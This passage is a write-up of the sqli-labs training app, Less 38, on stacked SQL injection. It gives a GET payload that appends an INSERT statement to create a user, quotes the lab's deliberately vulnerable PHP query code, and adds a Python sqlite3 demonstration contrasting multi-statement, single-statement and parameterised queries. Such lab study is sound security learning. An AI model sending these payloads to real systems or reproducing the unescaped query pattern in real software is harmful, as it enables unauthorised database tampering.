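Preface
Continuing with sqli-labs.
This post covers Less 38-45.
Less - 38: GET - Stacked Query Injection - String (stacked injection, string-based, GET)
Ordinary injection also succeeds here,
but this lesson is about learning stacked injection.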
?id=1';insert into users(id,username,password) values ('38','less38','hello')--+
The user is created successfully.
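The mechanism behind this result, as an added example that is not part of the original post or of the sqli-labs code. Python's sqlite3 stands in for the lab's PHP/MySQL stack (an assumption): `executescript` plays the role of a multi-statement query call, `execute` that of a single-statement call, and the table contents and function names are constructed.

```python
import sqlite3

# URL-decoded id value from the request above ("--+" decodes to "-- ").
STACKED_ID = "1';insert into users(id,username,password) values ('38','less38','hello')-- "

def make_db():
    """Constructed in-memory table shaped like the lab's users(id, username, password)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES (1, 'Dumb', 'Dumb')")
    db.commit()
    return db

def user_count(db):
    return db.execute("SELECT COUNT(*) FROM users").fetchone()[0]

def build_sql(user_id):
    # Same string concatenation as the lab's $sql line.
    return "SELECT * FROM users WHERE id='" + user_id + "' LIMIT 0,1"

def lookup_multi(db, user_id):
    """Concatenation + multi-statement API: every ';'-separated statement runs."""
    db.executescript(build_sql(user_id))
    return user_count(db)

def lookup_single(db, user_id):
    """Concatenation + single-statement API: the stacked statement is refused.
    The query is still built from untrusted text, so this is not a fix."""
    try:
        return db.execute(build_sql(user_id)).fetchone()
    except (sqlite3.Warning, sqlite3.Error) as exc:
        return "rejected: " + type(exc).__name__

def lookup_param(db, user_id):
    """Hardened: the value is bound as data and never parsed as SQL."""
    return db.execute("SELECT * FROM users WHERE id=? LIMIT 0,1", (user_id,)).fetchone()

if __name__ == "__main__":
    for name, fn in [("multi", lookup_multi), ("single", lookup_single), ("param", lookup_param)]:
        db = make_db()
        print(name, "->", fn(db, STACKED_ID), "| users now:", user_count(db))
```

Only the bound-parameter version removes the injection point; the single-statement call merely stops the second statement from running.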
A look at the source:
<?php
// take the variables
if(isset($_GET['id']))
{
    $id=$_GET['id'];
    //logging the connection parameters to a file for analysis.
    $fp=fopen('result.txt','a');
    fwrite($fp,'ID:'.$id."\n");
    fclose($fp);

    // connectivity
    //mysql connections for stacked query examples.
    $con1 = mysqli_connect($host,$dbuser,$dbpass,$dbname);
    // Check connection (mysqli_connect_errno() takes no arguments)
    if (mysqli_connect_errno())
    {
        echo "Failed to connect to MySQL: " . mysqli_connect_error();
    }
    else
    {
        @mysqli_select_db($con1, $dbname) or die ( "Unable to connect to the database: $dbname");
    }

    // $id is concatenated into the query unescaped: the lab's intended injection point
    $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";